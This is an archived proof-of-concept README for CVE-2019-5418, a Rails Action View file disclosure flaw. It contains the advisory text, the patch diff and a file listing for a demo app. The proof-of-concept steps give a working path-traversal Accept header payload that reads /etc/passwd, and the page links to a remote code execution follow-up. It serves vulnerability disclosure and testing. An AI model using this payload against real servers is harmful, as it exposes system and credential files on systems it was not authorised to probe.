CVE-2019-5418 PoC — Action View 信息泄露漏洞

Source

https://github.com/mpgn/CVE-2019-5418

Associated Vulnerability

Title:Action View 信息泄露漏洞 (CVE-2019-5418)
Description:Action View中存在信息泄露漏洞。攻击者可利用该漏洞泄露文件内容。

Description

CVE-2019-5418 - File Content Disclosure on Ruby on Rails

Readme

# CVE-2019-5418 - File Content Disclosure on Rails

**EDIT**: this CVE can lead to a Remote Code Execution, more info: https://github.com/mpgn/Rails-doubletap-RCE

> There is a possible file content disclosure vulnerability in Action View. 
Specially crafted accept headers in combination with calls to `render file:` 
can cause arbitrary files on the target server to be rendered, disclosing the 
file contents. 

> The impact is limited to calls to `render` which render file contents without 
a specified accept format.  Impacted code in a controller looks something like 
this: 

found by [John Hawthorn](https://twitter.com/jhawthorn) from GitHub

![image](https://user-images.githubusercontent.com/5891788/54474938-95f10c80-47eb-11e9-9a7c-8fa7c72ccd9e.png)

**Technical Analysis**: 
- https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/

**Security Advisory**:
- https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q

Fixed in Action View 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1 

```diff
From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001
From: John Hawthorn <john@hawthorn.email>
Date: Mon, 4 Mar 2019 18:24:51 -0800
Subject: [PATCH] Only accept formats from registered mime types

[CVE-2019-5418]
[CVE-2019-5419]
---
 .../lib/action_dispatch/http/mime_negotiation.rb   |  5 +++++
 actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
 .../new_base/content_negotiation_test.rb           | 14 ++++++++++++--
 3 files changed, 23 insertions(+), 6 deletions(-)

diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
index 498b1e669576..4e81ba12a58b 100644
--- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
+++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
@@ -79,6 +79,11 @@ def formats
           else
             [Mime[:html]]
           end
+
+          v = v.select do |format|
+            format.symbol || format.ref == "*/*"
+          end
+
           set_header k, v
         end
       end
```

___

### Proof Of Concept

1. Run the vulnerable application inside the demo folder:

```console
foo@bar:~$ cd demo/
foo@bar:~$ bundle install
[...]
foo@bar:~$ rails s                                                                                                                12:59:54
=> Booting Puma
=> Rails 5.2.1 application starting in development 
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
  Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
  Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)


Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
  Rendering README.md within layouts/application
  Rendered README.md within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
```

2. Go to the route `/chybeta`
3. Intercept with burp the request and replace the `Accept` header with `Accept: ../../../../../../../../../../etc/passwd{{`

![image](https://user-images.githubusercontent.com/5891788/54473502-fd519100-47d8-11e9-83f9-91abf2e9e2e0.png)


![image](https://user-images.githubusercontent.com/5891788/54474938-95f10c80-47eb-11e9-9a7c-8fa7c72ccd9e.png)

File Snapshot


 [4.0K]  /data/pocs/2d2f5e33914496035d45ed03661d9a87acbeca9d
├── [4.0K]  demo
│   ├── [4.0K]  app
│   │   ├── [4.0K]  assets
│   │   │   ├── [4.0K]  config
│   │   │   │   └── [ 101]  manifest.js
│   │   │   ├── [4.0K]  images
│   │   │   ├── [4.0K]  javascripts
│   │   │   │   ├── [ 721]  application.js
│   │   │   │   ├── [ 360]  cable.js
│   │   │   │   ├── [4.0K]  channels
│   │   │   │   └── [ 211]  chybeta.coffee
│   │   │   └── [4.0K]  stylesheets
│   │   │       ├── [ 709]  application.css
│   │   │       └── [ 178]  chybeta.scss
│   │   ├── [4.0K]  channels
│   │   │   └── [4.0K]  application_cable
│   │   │       ├── [  79]  channel.rb
│   │   │       └── [  85]  connection.rb
│   │   ├── [4.0K]  controllers
│   │   │   ├── [  57]  application_controller.rb
│   │   │   ├── [ 112]  chybeta_controller.rb
│   │   │   └── [4.0K]  concerns
│   │   ├── [4.0K]  helpers
│   │   │   ├── [  29]  application_helper.rb
│   │   │   └── [  25]  chybeta_helper.rb
│   │   ├── [4.0K]  jobs
│   │   │   └── [  43]  application_job.rb
│   │   ├── [4.0K]  mailers
│   │   │   └── [ 102]  application_mailer.rb
│   │   ├── [4.0K]  models
│   │   │   ├── [  78]  application_record.rb
│   │   │   └── [4.0K]  concerns
│   │   └── [4.0K]  views
│   │       └── [4.0K]  layouts
│   │           ├── [ 354]  application.html.erb
│   │           ├── [ 229]  mailer.html.erb
│   │           └── [  13]  mailer.text.erb
│   ├── [4.0K]  bin
│   │   ├── [ 125]  bundle
│   │   ├── [ 141]  rails
│   │   ├── [  90]  rake
│   │   ├── [ 957]  setup
│   │   ├── [ 819]  update
│   │   └── [ 303]  yarn
│   ├── [4.0K]  config
│   │   ├── [ 667]  application.rb
│   │   ├── [ 207]  boot.rb
│   │   ├── [ 200]  cable.yml
│   │   ├── [ 464]  credentials.yml.enc
│   │   ├── [ 594]  database.yml
│   │   ├── [ 128]  environment.rb
│   │   ├── [4.0K]  environments
│   │   │   ├── [2.1K]  development.rb
│   │   │   ├── [3.9K]  production.rb
│   │   │   └── [1.8K]  test.rb
│   │   ├── [4.0K]  initializers
│   │   │   ├── [ 216]  application_controller_renderer.rb
│   │   │   ├── [ 630]  assets.rb
│   │   │   ├── [ 404]  backtrace_silencers.rb
│   │   │   ├── [1.1K]  content_security_policy.rb
│   │   │   ├── [ 244]  cookies_serializer.rb
│   │   │   ├── [ 194]  filter_parameter_logging.rb
│   │   │   ├── [ 647]  inflections.rb
│   │   │   ├── [ 156]  mime_types.rb
│   │   │   └── [ 485]  wrap_parameters.rb
│   │   ├── [4.0K]  locales
│   │   │   └── [ 848]  en.yml
│   │   ├── [1.4K]  puma.rb
│   │   ├── [  57]  routes.rb
│   │   ├── [ 111]  spring.rb
│   │   └── [1.1K]  storage.yml
│   ├── [ 130]  config.ru
│   ├── [4.0K]  db
│   │   └── [ 370]  seeds.rb
│   ├── [2.2K]  Gemfile
│   ├── [5.2K]  Gemfile.lock
│   ├── [4.0K]  lib
│   │   ├── [4.0K]  assets
│   │   └── [4.0K]  tasks
│   ├── [4.0K]  log
│   ├── [  76]  package.json
│   ├── [4.0K]  public
│   │   ├── [1.7K]  404.html
│   │   ├── [1.7K]  422.html
│   │   ├── [1.6K]  500.html
│   │   ├── [   0]  apple-touch-icon.png
│   │   ├── [   0]  apple-touch-icon-precomposed.png
│   │   ├── [   0]  favicon.ico
│   │   └── [  98]  robots.txt
│   ├── [ 227]  Rakefile
│   ├── [ 374]  README.md
│   ├── [4.0K]  storage
│   ├── [4.0K]  test
│   │   ├── [ 157]  application_system_test_case.rb
│   │   ├── [4.0K]  controllers
│   │   │   └── [ 139]  chybeta_controller_test.rb
│   │   ├── [4.0K]  fixtures
│   │   │   └── [4.0K]  files
│   │   ├── [4.0K]  helpers
│   │   ├── [4.0K]  integration
│   │   ├── [4.0K]  mailers
│   │   ├── [4.0K]  models
│   │   ├── [4.0K]  system
│   │   └── [ 290]  test_helper.rb
│   ├── [4.0K]  tmp
│   └── [4.0K]  vendor
└── [3.7K]  README.md

42 directories, 65 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!